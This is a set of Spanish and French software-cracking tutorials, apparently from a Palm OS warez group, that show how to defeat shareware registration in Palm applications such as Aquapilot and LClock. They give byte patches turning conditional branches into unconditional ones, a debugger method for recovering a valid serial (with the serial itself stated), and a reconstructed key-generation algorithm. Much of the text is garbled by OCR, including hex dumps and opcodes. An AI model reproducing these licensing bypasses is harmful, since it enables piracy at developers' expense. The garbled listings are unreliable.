1) TuningFork 1.1 - Key(5905924416) Full Afinador Tenedor txt TuningFork 1.1 - Key(6905924416) Full Afinador Tenedor .pre | 


24 C:AMy DowmnloadsiTuningFork 1.1 - Key(6905924416) Full Afinador Tenedor .txt 
40 50 

OR. W (A3), D7? 
BVC.8 $c11 
DC. 7743 
BLE. LOC_COA 

SBEC 

$COB 

$C1B 

LOC BBA 


U 7 


pp > q .0 "Ogg E TOCA 


A 


OOODOb5Oh : POf.v./.NOÍp.D.f 
D0ODOb60h : XOf..|.. y *J.g. 


00000b70h E FO; B-w.|.. v?<. ¿NO 
D0000HS0h q : : igTO' .?<.LNOÍETO 
DDODOLP90h “HED E e vLex Nuis 
DODODbaD : - howCodeDialog... 
ODODObkbOh:* E 30 35 39 EXE 4 34 3] € 00 D0 O 24416. .NV 


DOOOObcOh: 48 E7? 10 30 24 6E 00 08 76 00 OC 52 DD 09 66 14 1510 a cod PU Y LS - ES 


bil nao ER 


. 
y 


DOOOOb90h | h A O y. su*nuis 
OO0000ba0 6127 9: e : howCodeDialog... 
OODOOEHHO0Hn: E 39 30 3 39 32 4 4 13€ lb O 4E 56 DO ; (ji? 4416 NU 

DOOOObcOh: Hb Dn Raids 
DOOOOObdO0h: 30 24 00 08 04 40 05 17 67? 02 60 24 4E BA FF 00 ; 0*...8..g9. $nl ; 
DOOOObeO0h: 76 01 60 1C OC 52 OO 18 66 16 4E 4F Al 73 26 48 ; vw. '..R..f.NOiscH 
OOODOBfOh: 2F OB 4E BA FC F2 2F OB 4E 4F A1 71 76 01 50 4F ; ¿.N[”_/.NOiqv.PO 
DOOOOcOO0h: 10 03 4C DF OC 08 4E SE 4E 75 94 52 65 67 69 73 ; ..L*, .N*NuóRegis 


A IAS: 


Si necesita ayuda, pulse F1 [Lín. 1185, Col. 29, CO DOS | ¡Mod.: 06/01/05 06:48:32p.m. Tamaño: 72254 INS | 


Si miramos el desensamblado veremos que el microprocesador siempre sigue una secuencia tanto al desensamblar como al abrir el editor 
hexadecimal 


00000B9E 8E 53 OR.W (A3), D7 

00000BAO 68 6F BVC.S $C11 

00000BA2 77 43 DC.W +$7743 

00000BA4 6F 64 BLE.S LOC_COA 

00000BAG 65 44 BCS.S $BEC 

00000BA8 69 61 BVS.S S$COB 

00000BAA 6C 6F BGE.S $C1B 

00000BAC 67 00 00 OC BEQ LOC_BBA 

00000BBO 36 39 30 35 39 32 MOVE.W $30353932, D3 
00000BB6 34 34 31 36 MOVE.W $36(A4, D3.W), D2 
loc_BBA: 


Si la parte morada la separamos veremos: 


8E 53 

68 6EF 

77 43 

6Fr 64 

65 44 

69 61 

6C 6F 

67 00 00 OC 

36 39 30 35 39 32 
34 34 31 36 


Si usamos la lógica del editor hexadecimal que pone todo corrido observamos: 


8E 53 68 6F 77 43 6F 64 65 44 69 61 6€C 6F 67 00 00 OC 
36 39 30 35 39 32 34 34 31 36 


4E48 (TRAP into debugger) Trap debugger 
4E71 (NOP) No hacer nada NOPEAR 


103C0000 (Move.B +0, DO) Función frecuente 
103Cc0001 (Move.B +1, DO) Función frecuente 


AL ATAQUE 
Cambiando BEQ por un BRA en [00000BAC 67 00 00 0C BEO LOC_BBA] en el offset 00000BAC 


BEO = 67 en hexadecimal 


BRA = 60 en hexadecimal 


00000B9E 8E 53 OR.W (A3), D7 
00000BAO 68 6F BVC.S $C11 
00000BA2 77 43 DC.W 47743 


00000BAZ 6F 64 BLE.S LOC_CO0A 
00000BAG 65 44 BCS.S $BEC 
00000BAB8 69 61 BVS.S $COB 
00000BAA 6C 6F BGE.S $C1B 


00000BAC 67 00 00 OC BEQ LOC_BBA 

00000BBO 36 39 30 35 39 32 MOVE.W $30353932, D3 
00000BB6 34 34 31 36 MOVE.W $36(A4, D3.W), D2 
loc_BBA: 


Entonces queda 


00000B9E 8E 53 OR.W (A3), D7 
00000BAO 68 6F BVC.S $C11 
00000BA2 77 43 DC.W 47743 


00000BAZ 6F 64 BLE.S LOC_COA 
00000BAG 65 44 BCS.S $BEC 
00000BAB8 69 61 BVS.S $COB 
00000BAA 6C 6F BGE.S $C1B 


00000BAC 60 00 00 OC BEQ LOC_BBA 

00000BBO 36 39 30 35 39 32 MOVE.W $30353932, D3 
00000BB6 34 34 31 36 MOVE.W $36(A4, D3.W), D2 
loc_BBA: 


Guardamos el archivo y lo desensamblamos y vemos que la instruccion ha cambiado por: 


% UltraE dit-32 - C:AMy Downloads TuningFork 1.1 - Key(6905924416)] Full Afinador Tenedor .txt 


Archivo Editar Buscar Proyecto Yer Formato Columna Macro Avanzado Wentana ¿Ayuda 
|| TuningFork 1.1 - Key(6305924416) Full Afinador Tenedor .txt* | se cambio por BRA txt | 


24 C:AMy DownloadsiTuningFork 1.1 - Key(6905924416) Full Afinador Tenedor -txt* 


(A3), D? 
BVC.S $c11 
DC.W 7743 

DOBA4S BLE.S$ LOC_CO0A 
D00DOBA6 BC3.3 $BEC 
OMO0D0O0BAS BVS.9 $COB 
BGE.$ $C1B 


LO ye 


MOVE. W $30353932, D3 
MOVE. W $36(44, D3.W), D2 


DC.W 7743 

BLE. LOC_CO0A 
BCS. $SBEC 
BV3. $C0B 
BGE. $C1B 


DON PBI 


$30353932, D3 
$36(A44, D3.W), D2 


$50, DO 


SM MB Ms E SP Obh ooo 


Si necesita ayuda, pulse F1 [Lín. 1184, Col. 2, CO [DOS lMod.: 06/01/05 06:48:32p.m. [Tamaño: 72255 IINS | 


Véase la difencia entre BEQ y BRA 


Concluimos que en un archivo desensamblado siempre veremos las instrucciones en formato hexadecimal seccionado, recordemos que el 
offset es la hubicacion del codigo y no lo consideraremos para parchar instrucciones. 


Esto es todo por hoy 
Hasta la proxima. 


Colabora con tus tutoriales. 


Palm Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion en palm. Email "Colabora con tus Proyectos" 


Palm Spanish Tutor 


PROTECCION: NAME / SERIAL 


http://www .palmgear.com/software/showsoftware.cfm?8zprodlID=2415 


INTRODUCCION 


Pescando un serial con la ayuda de southDebugger 


El southDebugger: Es un debugger como debuffer pero mucho mejor. Escrito a en Java con muchas más 
características. 

DebugHack y X-Master : Necesario con southDebugger 

El PRCedit: Para usar a preEdit, usted necesitará a PilotDis. 

POSE : El emulador Palm disponible en palmos.com. 


AL ATAQUE 


¡La advertencia! 


Este manual de instrucción va con destino hacia crackers que ya habían leído un Libro de Palm. No explicaré el uso de preEdit 
tampoco el lenguaje ASM. Un conocimiento de Palm Programando y PalmOs API es altamente recomendable. 


Comencemos 


Instale maestro a X, DebugHack y Aquapilot en el emulador. 
Primero, lancemos a Aquapilot y estudiemos la aplicación. 
Después de presionar el botón del menú, podemos ver que hay una forma de registrar: 


heroe 
ao 
Coma] caen JEPORT|SGHEDUE 


Maintenance History 


Así es que La aplicación nos pide que introduszcamos un serial: 


[Aquapilot | 


Aquariurn 


Si entramos en una contraseña y damos un clic Bien botón, entonces vemos un mensaje de chico malo: 


[Aquapilot | 


Aquariurn 


CHART | GRAPH [EXPORT 


Message 


D Sorry wrong code. 


Hmm, está bien, La aplicación de mal chico se muestra en una ventana al introducir un password falso,esta es una mamada. 


El preEdit 
Encendamos el preEdit y mire el código. 


Si miramos las diferentes alertas de esta aplicación, entonces deberíamos ver las alertas no han obtenido nombre y ellas son exhibidas 
con la llamada del sysTrapFrmCustomAlert. 


Todas las alertas son anónimas: 


Preedit - [LCR 1] 


* File Edit Wiew Tools Window Help 


A 
e 


5-63 Forms 
6-29 Alerts 


a + 1000 ”1 
(8-- + 11001 
loo 130001 
o E + 2000*1 
0-£3 Stings 
-£4 dc.b 


Ésta es la forma que una ventana de diálogo es llamada en Aquapilot: 

00001f8c  3f3c044c MOVE.W +t1100!$44c,-(A7) ; M1 

00001190 4e4fa194  TRAP+H15 

00001f94  DC.W sysTrapFrmCustomAlert 

Pensemos un poco. 

No queremos poner en bitácora la ejecución del programa entero. Por eso es que queremos colocar dos breakpoints. Uno poco antes de 
introduciendo el serial (al comienzo de la entrada de datos en la ventana) y uno propiamente atrás eso (En el mensaje de mal chico). 
Comenzamos poniendo en el logging(Serial) en el primer breakpoint y nosotros lo detenemos en el segundo. 

Tratamos de pescar la buena contraseña, el despliegue del mal mensaje del niño quiere el fin de la rutina de inscripción así es que la 
función API SysTrapFrmCustomAlert debería ser nuestro breakpoint 2. 

Está bien, ahora tenemos que encontrar el primer breakpoint determinado. 

Se sabe que la aplicación muestra esta ventana cuando queremos registrarnos 


[Aquapilot | 


Aquariurn 


Please enter your code: 


l 


Con el conocimiento de programación en Palm que usted tenga, deberíamos suponer que esta forma aparece de pronto gracias al uso 
de la función del sysTrapFrmPopupForm. 

Así es que vamos a colocamos nuestro breakpoint 1 en el sysTrapFrmPopupForm función. 

La explicación de lo que haremos ahora con southDebugger 

Coloque un breakpoint en que la función del sysTrapFrmPopupForm colocó un breakpoint en sysTrapFrmCustomAlert 

Ponga en bitácora en un archivo que todo el código ejecutó entre estos 2 breakpoints. 

Encuentre en el archivo log el serial que hemos introducido. 

Mire en el fichero si nuestro código introducido es comparado con un registro. 

Tome el valor de este registro comparado y úselo registrar nuestra aplicación. 

Si todos los empujes enmiendan, entonces la aplicación estará registrada. 

El southDebugger Parte 

Entonces, si no le ha corriedo,cargar el POSE , entonces instale maestro a X, debughack y Aquapilot. 

Lance southDebugger. 

Le preguntará acerca del IP en la PC conque corrie el Pose. Justamente haga clic en el botón conectar. Ahora usted debería tener esta 
ventana: 


RE 


SouthDebugger está esperando un breakpoint. 


Primer, tenemos que hacer que el southDebugger se detenga así es podremos añadir breakpoints. Para eso, justamente lanzamos X- 
Master . El southDebugger debería hacer un break, y ahora usted ha obtenido esto: 


El southDebugger está arriba pero Pose se queda atorado. 


Como el southDebugger está arriba, estableceremos nuestros breakpoints. 


Dé un clic sobre ventanas windows/new breakpoint en el menú. Entonces escoja el "trap breakpoint" etiqueta y dé un clic sobre los 
3 puntos "" De la fila 1. Una ventana esta pronta a mostrar un popup con todas las funciones del sysTrap. 


ndisystrapFrenp 
sysTrapFrmSetTitle 
sysTrapFrmilert 


SA sysTrapFrmDoDialog 


A PA] L sysTrapFruiCustomálert 

| sysTrapFrmHelp 
sysTrapFrmUpdateScrollers 
sysTrapFrmcGetFirstForm 
sysTrapFroVisible 
sysTrapFrmcet0bjectBounds 
sysTrapFrmCopyTitle 


sysTrapFrmcotoForm 

| sysTrapFrmPopupForm 
sysTrapFrmUpdateForm 
sysTrapFrmReturnToForm 
sysTrapFrmSetEventHandler 
sysTrapFrmDispatchEvent 
sysTrapFrmCloseAllForms 


Encuentre y escoja la función del sysTrapFrmPopupForm y de una selección y un click. Haga lo mismo para colocar el breakpoint en 
la función del sysTrapFrmCustomAlert. Ahora usted ha obtenido esta ventana: 


Y entonces presione FS . Esta funcion esta a punto de desplegar el Pose. Ahora, AquaPilot a de funcionar. Cuando usted lo ponga a 
funcionar, debería de detenerse por los breakpoints en sysTrapFrmPopup. Justamente presione a F5. Ahora, dé un clic sobre el 
botón del menú y presione a Register. 


El POSE se interrumpirá otra vez (por el breakpoint en sysTrapFrmPopup). En el debugger dé un clic sobre eWindows / New 
logging window , Estas ventanas aparecen: 


Nez " 


Haga clic adelante "de las ventanas” y entonces seleccione "to file - para el archivo". Entonces dé un clic sobre los 3 puntos para 
colocar el directorio donde para poner el LOG archivo. No se olvide de nombrar el archivo log, y entonces presione Salvar. 


Sujete el botón puesto auto-run button a funcionar (se hace gris marengo) 
Presione F8 para mantener el programa hasta que aparesca el logging. 
RED 


ER 


A eo o 


p breakpoints |cond 
a SO QIER 


SET y 


AN 
A AE PTI 


¡Después de presionar a F8, el logging empezara ! 

Ahora usted ha logrado apariencia en Pose. La forma donde usted tiene que entrar su serial pronto estara en pocos minutos. He 
obtenido un cargador en PC y la función del logging necesita parte de recursos en casa, lleve 50 minutos para la forma al popup. 
Entonces, introduzca un serial falso y presione a Ok. No le importa si usted piensa que Pose no percibió la captuta del UR. El POSE 
será muy lento pero entenderá que todos los clicks;) 

El serial usado es: 123456 (in decimal = 1e240 in hex.) 

No lo olvide, lo necesitaremos al leer el archivo log. 

Al cabo de un rato (20 minutos en casa), el mal mensaje del niño aparece. 

Eso significa que el logging está terminado. Justamente dé un clic sobre el botón Stop Log 


E log opcodes la y! log routine (vi y log register values 


Yi pnly log in with this prefe | Ñ 


SP: 00000000 PC: 10061722 SR: O000A000 
10C61722 2448 MOVEA.L 40, AZ 


Ahora, abra el archivo log y haga una búsqueda de 1e240 (nuestro serial falso). Usted lo encontrará un montón de veces pero cada vez 
que usted se ha puesto a analizar el código a ver si hay una comparación entre nuestro serial falso y el serial correcto. 


Después de un rato buscando 1E240 en el texto, nosotros descubrimiento este: 


D0:00000000 D1:0000295A D2:00000007 D3:0001FC6F D4:0001E240 D5:0000001E D6:00000000 D7:00000001 
A0:00045F26 A1:10C94BDC A2:0003CB74 A3:0003CB6E A4:00005228 A5:000050A4 A6:00050F83 A7:0003CAFA 
USP:00000000 PC:0005ABB8 SR:0000A000 

0005ABB8 B883 CMP.L D3, D4 


Ok estudiemos el código. 

D4 contiene el valor 1e240 = 123456(en decimal) = Serial falso introducido 

CMP.L D3, D4 < - Compara el valor en D3 y el que está en D4. 

Podríamos pensar que D3 contiene el serial bueno:) 

D3 valor = 1FC6C (en hexadecimal) = 130159 

Desactivemos todos los breakpoints en southDebugger y probemos este serial con Aquapilot. 


|[Aquapilot | 


Aquariurn 


Please enter your code: 


130154 


El serial correcto es entonces 130159 para Aquapilot 3.01E 


Heeeeyyyy , hemos comprendido este bebe;) Ahora usted sabe como pescar un serial con southDebugger;) 

No se olvide del soporte shareware y si a usted le gusta ello, debe comprar el software. 

Agradecimientos 

Gracias a _ olor fuerte Dr, _ 42 _ cervezas, BratKo, Einstein (el camarada heh, no abuse del tabaco;) , Flognat, Flexible, alienD y 
todos los miembros de otros PWG. 

Cualquier pregunta: a la dirección de correo electrónico chowiO pilotwarez.com 

Usted nos puede encontrar en + palmwarez (IRCnet) o visite nuestro webpage en http://pilotwarez.com 
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PROTECCION: NAME / SERIAL 


SouthDebugger, PRCedit, PilotDis. POSE Palm emulator 


INTRODUCCION 
como se aprovechan de la gente, pues decidimos probarlo. 


Acercamiento 1 

Comienza abriendo el pre con preEdit y mirando los recursos. ¿Ninguna de las llamadas para 
sysTrapStrCompare o sysTrapCaselessCompare, así es que la rutina del registro son un poco más elegantes 
que eso ... Qué más hemos llegado? Sano, que tenemos una referencia en la forma 1100, "Introduce 
RegCode". El aspecto general siendo promisorio, tanto nos dejó que decidimos hacer averiguaciones. 


AL ATAQUE 


0000040a 3f3c044c L26 MOVE.W +t1 100!$44c,-(A7) ; Enter RegCode 
Un pedazo de código que vemos abajo: 

0000046a DC.W  sysTrapStrLen 

0000046a 0c400014 CMPILW ++20!$14,D0 


¿Qué significa esa cadena tan larga (¿Nuestro serial introducido?) 

Es comparado con 20. Una apariencia en la ventana de la pila del southDebugger cuando se traza esta parte del código ,nos dice que eso es ciertamente comprobando la longitud 
de nuestro serial introducido. Así es que nosotros ahora tenemos que considerar un serial con 20 caracteres, XXXXXXXXXXXXXXXXXXXX. 

Entonces tenemos esto: 

00000472 0c2a002d0004 CMPLB +t45!$2d,4(A2) 

00000478 666e BNE L29 

0000047a 0Oc2a002d000f CMPLB +t45!$2d,15(A2) 

00000480 6666 BNE L29 


Las dos líneas del CMPI.B checan la posicion 4 y 15 al registrar A2 si es igual a 45 (o 0x2D hexadecimal). En A2 podemos buscar nuestro serial entrado, y haciendo una 
comprobación en una tabla ASCII eso da 45 ' - '. Esto da un serial del tipo XXXX-XXXXXXXXXX-XXXX 

En L27 tenemos que tambien se hace una acción. Aquí parece que un código está siendo generado. 

0000048a 10320800  MOVE.B 0(A2,D0.L),DO 

Es una típica rutina para la generación del serial. Se dispone a llevar el byte en A2 en posición DO y meterlo en el registro DO para más adelante procesarlo. Se lo dejo a usted 
investigar cómo surte efecto esta rutina: ) 


Lo consigue abajo en: 


000004b4 2600 MOVE.L DO,D3 
000004b6 b684 CMP.L D4,D3 
000004b8 584f ADDQ.W +$4,A7 
000004ba 662c BNE L29 


Aquí tenemos una comparación del destino del serial ... En D3, separa el serial introducido y lo guarda, y en D4 tenemos la información que la aplicación considera correcto. 
Si D4== D3, todo está bien y la aplicación es registrada. En caso contrario, usted ha entrado un serial malo. De hecho, un rastreo usando el serial 1234-abcdefghij-5678 nos 


sale a la vista que sólo compara los últimos 4 dígitos 


¿Cómo parchar esto entonces? ,Es sano que usted quizá podría cambiar el BNE 129 a BRA, pero nos deja hacer un parche más bonito. Si nosotros cambiamos al MOVE.L DO, 
a un MOVE.L D4, D3, la aplicación de hecho comparará el serial generado con sí mismo ... que Usted también puede tener alguna diversión y crear seriales como "love- 
pweforever-pwegforever-9528":) 


Acercamiento 2 

1 yo veo probeco en este sitio. Puede ser regged, y tiene un período de prueba de 5 días con Nag. 
2 lo pruebo en la POSE, Tomo nota del título de la forma del reg, "Introduzco a RegCode" 

3 lo abro con Preedit 


4 localizo la forma y doy un paso en el código en L26 


5 veo que el programa hace lo siguiente: 

- Toma el índice del campo donde yo introduje el código 

- Toma la dirección de los campos 

- Toma las direcciones de los caracteres introducidos (en A2 y DO) 

- Checa la longitud de caracteres, deben tener 20 caracteres (sysTrapStrLen, CMPLW + 20, DO) 

- Los chequeos en el registro de codigo debe de contener el caracter "-" en el regcode. Sospecho que son "-" porque tienen a ASCII codifique 45 (tantee con alt + 45). ¡ 
Deben estar en CMPLB + 45!$¡2d, 4 (A2) 5 y CMPLB + 45!$2d, 15 (A2) en la posición 16 (los caracteres son numerados desde 0). L29 es obviamente llamado si algo no es 


correcto. 


6 pruebo mis hypotesis poniendo a un 4e48h (trap 8) después de esos chequeos y entonces introduzco en la computadora XXXX-XXXXXXXXXX-XXXX como un código. 
Entonces, L28 debe ser el Check realmente Crucial Routine. 


7 doy una vista a L28. Hay sólo dos comparaciones, y el segundo atrae mi atención. 


000004b0 4e4fa0Oce sysTrapSstrATol 
000004b4 2600 MOVE.L DO,D3 
000004b6 b684 CMP.L D4,D3 
000004b8 584f ADDQO.W +4,A7 
000004ba 662c BNE L29 


¿ Pongo cuidado en esta string (cadena) (tal vez es el que yo introduje) El valor es convertido a un valor decimal, ese valor es almacenado en DO y entonces es movido en D3. 
¿Entonces es comparado con D4 (tal vez el serial correcto) Solamente, si los valores no son lo mismo, entonces la inscripción falla. Así fuerzo el proceso de registro y acaba con 
noping aquel BNE L29 (4e71h) 


8- Bien el programa ahora se registra muy bien con XXXX-XXXXXXXXXX-XXXX. También le podría hacer registrar con cualquier NOPing de código con otras entradas, pero 
no prefiero hacerlo (Agil parche que probablemente trabajará más largo). Con la ayuda de Prcedit finalmente escribo el xml. 


Aproximación 3 


El visto bueno, he aquí mi forma. Es similar a las otras formas, pero ahora comencemos.Después de tener una apariencia de cortocircuito en la aplicación, advertí el registro en 
pantalla al entrar un serial. Así es que puse en marcha el preEdit y cargué nuestro blanco. En el árbol de recursos de preEdit que eso es fácil encontrar el recurso de la forma del 
registro (ID: 1100). Hay una referencia para el ID del OK-BUTTON, tal vez tengo la suerte de encontrar allí el chequeo de registro. Después de double click en la referencia 
podemos ver algunas cosas agradables de código. Algunas líneas de debajo hay una llamada para sysTrapFldGetTextPtr, probablemente nuestro serial que introducimos. Después 
podemos ver esto: 


0000046a DC.W sysTrapStrLen 
0000046a 0c400014 CMPI.W +20!$14,DO 
Asi que nuestro serial tiene 20 caracteres, esto se pone facil, Algunas líneas más 


00000472  0c2a002d0004 CMPLB +45!$2d,4(A2) 


00000478 


666€ 


BNE L29 


0000047a 0c2a002d000f CMPI.B +t45!$2d,15(A2) 


00000480 


Adivinemos un tanto. En ASCII + 45 es un guión 


6666 


BNE L29 


"-", tan tal vez el 5 y el carácter 16 tienen que ser uno "-". Las siguientes líneas no están haciendo algunas cosas de cálculo, 


ninguna cosa interesando. Lo siguiente compara orden está aquí: 


000004ac 
000004b0 
000004b4 
000004b4 
000004b6 


48640010 PEA 16(A2) 


de4fa0ce 
DC.W 
2600 
b684 


TRAP +15 
sysTrapStrATol 
MOVE.L D0,D3 
CMP.L D4,D3 


16 (A2) es un puntero para los últimos 4 caracteres del serial, estos caracteres son convertidos a un valor de entero. Esto se parece realmente a un checksum. Ahora 
coloquemos a un Breakpoint en dirección el CMP-COMMAND, inicie la aplicación e introduzca un serial como "1234-6789012345-7890". Después de entrar el breakpoint, 
Veamos en D4: El valor es 9490. Reemplacemos a nuestros últimos 4 caracteres con este valor y hagamos un intento otra vez: "1234-6789012345-9490" Y sí, eso tiene que 
trabajar ... Eso es todo, ahora tiene que trabajar el serial. 
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PROTECCION: Desnudando un serial 


Descripcion: 


Dificultad: 


SouthDebugger, DebugHack and X-Master, PRCedit, PilotDis. POSE Palm emulator 


Generación de un serial 


DOWNLOAD : 


Herramientas: 


Palm CRACKER: wW/31/12/2004 


INTRODUCCION 
Éste es un corte de ASM-CODE de una aplicación, mostrando la parte donde la generación de clave calcula. 


AL ATAQUE 
00002a3e 4delfa2la9 sysTrapD1kGetSyncInfo ( get the HS name ) 
00002a42 486f0018 PEA 24 (A7) 
00002a46 4e4fa0c7 sysTrapStrLen ( length of the HS 
name -> DO ) 
00002a%4a 3e00 MOVE .W DO,D”7 ( save the length to 
D7 ) 
00002a4c 7600 MOVEO $0,D3 ( | set D3 to O for 
use as a counter ) 
00002a4e 4fef001c LEA 28(A7),A7 
00002a52 601c BRA L401 ( start the looping ) 
00002a54 41d7 398 LEA (A7) AO 
00002a56 18303000 MOVE .B 0(A0,D3.W),D4 char nr D3 in the 
hs-name -> D!4 ) 
00002a5a 4884 EXT.W DO 
00002a5c 0644ff9f ADDI.W $-97!-$61,D4 D4 :=D4 - 97 ) 
00002260 6c06 BGE L399 if D4 >= 0, branch 
to L399 ) 
00002a62 3004 MOVE .W D4,DO DO :=D4 ) 
00002a64 4440 NEG.W DO negate DO ) 
00002a66 6002 BRA L400 branch to L400 ) 


00002a68 3004 L399 MOVE .W D4,D0 (DO := D4 ) 
00002a6a 3a00 L400 MOVE .W DO,D5 (D5 :=D0 ) 
00002a6c dc45 ADD.W D5,D6 (D6 :=D6+.D5) 
00002a6e 5243 ADDO.W $1,D3 ( increase the 
counter ) 

00002a70 b647 L401 CMP .W D7,D3 ( has the loop 
finished? ) 

00002a72 6de0 BLT L398 ( if not, branch to 
L398 ) 

00002a74 700b MOVEO $11,D0O (DO := 11 ) 
00002a76 c1c6 MULS .W D6,DO (DO :=D6 x DO) 
00002a78 0640001b ADDI .W +27!$1b,D0O (DO := DO + 27 ) 


Muestra el serial usando el Nombre del hoctsync-Name en DO y resultando el siguiente Pseudocódigo 


serial := 0; 
for counter := 1 to length(name) do 

serial := serial + abs(ord(name[counter]) - 97); 
serial := (11 * serial) + 27; 
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Palm CRACKER: o ema 1/31/12/2004 


INTRODUCCION 


Débogage du logiciel LClock V1.0 


La cible: 


LClock est un programme affichant une petite horloge avec alarme. Il est aussi 
possible de faire afficher l'heure d'un autre fuseau horaire. 


AL ATAQUE 


Le but : 
LClock laisse a l'utilisateur le temps qu'il désire pour essayer le produit, au dela il doit 
s'enregister. La seule limitation est le message "Please Register" a l'écran.Si l'utilisateur 


achéte la license, il recoit un code débloquant le programme (clé). Nous allons essayer de 
déboguer le programme afin qu'il accepte n'importe quel code. 


La_philosophie : 


Comme dans la lecon n*1, nous allons utiliser la méthode dite "Dead Listing" (Code source 
mort). Cette méthode est basée sur la lecture et la compréhension du code source. 


l'approche: 


Nous chercherons a repérer ou est situé le message indiquant que le code entré n'est pas bon, 
puis ou est située la partie de code qui affiche ce message, puis finalement les instructions qui 
appellent ce code, et a quelles conditions.Ensuite nous modifierons ces conditions. 

Les outils : 

Nous utiliserons : 

Prc2Bin pour séparer les différentes ressources du programme. 


PilotDis pour désassembler le code du programme. 


PalmEmulator pour émuler un Palm Pilot, soit pour ceux qui n'en possede pas, soit pour éviter 
de travailler sur son vrai Palm (la HotSync a répétion est assez fastidieuse) 


HexEdit pour patcher le programme final. 


lere partie : Repérage 


Lancez PalmEmulator et chargez le programme LClock. 


|| se peut que l'affichage du PalmEmulator ne se réactualise pas. Cliquez sur le bouton de 
l'agenda puis revenez, l'icone de LClock apparaitra. 


Lancez le programme... Vous voyez un message "Please register" a l'écran. Cliquez dessus 
pour afficher l'écran d'enregitrement.Le programme attend que vous tapiez le code de 
déblocage. Tapez un nombre bidon au clavier ( avantage de l'émulateur ) puis cliquez OK. Le 
logiciel indique que la clé est mauvaise ("The key entered is not correct"). Retenez bien ce 
message en anglais. Vous remaquerez le message "(not set)" a l'écran. Cela correspond au 
nom d'utilisateur, qui n'est pas définit (set) sur l'émulateur. 


2eme partie : Analyse 
2.1) Numéro de la ressource. 


Depuis une ligne de commande Dos, lancez le programme Prc2Bin avec en parametre le fichier 


Iclock.prc. Pre2Bin crée alors 47 fichiers. Ces fichiers contiennent les différentes parties du 
logiciel LClock. Avec la commande Rechercher de Windows, cherchez le fichier qui contient le 
texte "not correct" (tiré du message d'erreur ci-dessus). En résultat nous avons Iclock.prc bien 
sÚúr, mais aussi le fichier nommé Talt235c.bin. Le nom de ce fichier n'est pas anodin: alt 
signifie alert, pour indiquer que ce fichier contient un message d'alerte. 235c indique le 
numéro de ce message en hexadécimal; ainsi , quand on rentre une mauvaise clé, le logiciel 
demandera au Palm d'afficher le message d'alerte numéro 235c. 


2.2) Recherche de la ressource 


Faites glisser l'icone de Iclock.prc sur le programme de PilotDis. || crée dans son répertoire un 
fichier LCLOCK.PRC.s . Renommez-le en LCLOCK.PRC.s.txt ,puis ouvrez-le en double-cliquant 
dessus. Ce document texte contient la retranscription du programme en langage assembleur 
68000. 


Nous allons chercher maintenant a quel endroit du programe est appellée la ressource numéro 
235C. 


Dans le code source, les nombres hexadécimaux sont précédés du signe "$". Nous allons donc 
faire une recherche avec la fonction de recherche de texte de WorkPad, et nous lui indiquons 
que l'on cherche le texte "$235c". 


WorkPad trouve une occurence : 


00001af4 610000d4 BSR L198 

00001af8 defc0014 ADDA.W +20!$14,A7 
00001afce 4a40 TST.W DO 

00001afe 660e BNE L190 


00001b00 3f3c235c  L189 MOVE.W +$9052!$5235c,-(A7) 


00001b04 4e4fa192 TRAP ++15,$A 192 = sysTrapFrmAlert 
00001b08 7001 MOVEO +*1,D0 
00001b0a 60000028 BRA L193 


00001b0e 2483 L190  MOVE.L D3,(A2) 
00001b10 3f3c235e MOVE.W +$90541!$235e,-(A7) 


00001b14 4e4fa192 TRAP ++15,$A 192 = sysTrapFrmAlert 


2.3) Compréhension du code source 


Si vous avez bien suivis la lecon n*01, vous pouvez déja comprendre ce morceau de code. En 
1189 se produit l'affichage de notre message d'erreur $235c, puis le programme continue son 


execution en L193. En L190 se produit l'affichage d'un autre message, le $235€e. Si vous 
cherchez dans le répertoire de Prc2Bin la ressource Talt235e.bin, et que vous ouvrez ce fichier 
avec NotePad ou HexEdit, vous voyez que ce message correspond a l'affichage de "Thank you 
for registering LClock". Intéressant ! 


Maintenant regardons un peu plus haut : a l'adresse laf4 s'effectue un appel a la sous-routine 
L198 (bsr= branch to sub-routine). La ligne en laf8 ne nous interesse pas. En lafc se fait un 
test sur DO. Comme DO est tres souvent utilisé pour exprimer le résultat d'une procédure, on 
se doute que la valeur de DO dépend de la sous-routine L198 appelée plus haut. En lafe se 
décide suivant la valeur de DO si l'on doit soit afficher le message d'erreur (si DO=0), soit le 
message de remerciement (si DO<>0). 


La solution est donc simple: modifier le BNE L190 en BRA L190 afin que quelque soit le 
résultat de la procédure L198 exprimé dans DO, on lance le message de remerciement. Le BNE 
L190 est s'écrit en hexadécimal 660e (66 pour le BNE, et Oe pour le L190). Comme l'octet 
codant le BRA est 60, on changera donc l'instruction 660e en 600e. 


Lancez donc HexEdit, ouvrez le fichier Iclock.prc, faites Edit/Goto, tapez lafe comme adresse. 
HexEdit nous amenes au 660e. Remplacez-le par 600e, puis quittez HexEdit en sauvegardant 
le fichier modifié, et en acceptant la sauvegarde en .bak. 


Maintenant lancez le PalmEmulator, chargez le fichier Iclock.prc modifié, lancez LClockn, 
enregistrez-vous en tapant un numéro au hasard, et appuyez sur ok .. et hop! le programme 
vous remercie de vous étre enregistré. Voila, tout pourrait étre bien qui finit bien, seulement 
quand vous tapez ok, vous voyez que le message "Please Register" est toujours la !! Damn ... 
Magie Noire ? 

Il faut se rendre a l'évidence, la seule modification que nous avons faite ne concerne que 
l'affichage du message, mais n'enregistre pas réellement le programme. Un test doit étre fait 
ailleurs ... D'apres ce que nous avons vu plus haut, la sous-routine L198 semble étre faite 
pour tester la clé, et retourner un résultat dans DO. Nous avons vu que si DO vaut zéro cela 
induit le message d'erreur, et si DO est différent de zéro le message de remerciement. 


Jetons donc un oeil a la routine L198 en faisant une recherche de texte sur L198. Nous 
obtenons : 


00001bca 4e560000 L198 LINK A6,+0 

00001bce 48e71f00 MOVEM.L D3-D7,-(A7) 

00001bd2 2c2e0008 MOVE.L 8(A6),D6 

00001bd6 2e2e000c MOVE.L 12(A6),D7 

La commande Link A6,+F0 est celle qui commence toute procédure. La fin d'une procédure est 
obtenue par la commande RTS, qui ramene a l'instruction suivant la BSR qui a appelé la 


routine. 


Cherchons donc la fin de la routine L198, en faisant une recherche de texte sur "RTS". Nous 
trouvons : 


00001c4e b083 CMP.L D3,DO 


00001c50 670c BEQ L200 


00001052 2f04 MOVE.L D4,-(A7) 

00001054 4e4fa012 TRAP +15,$A012 = sysTrapMemChunkFree 
00001c58 4240 CLR.W DO 

00001c5a 6000000a BRA L201 


00001c3e 2f04 L200 MOVE.LL D4,-(A7) 

00001c60 4e4fa012 TRAP +15,$A012 = sysTrapMemChunkFree 
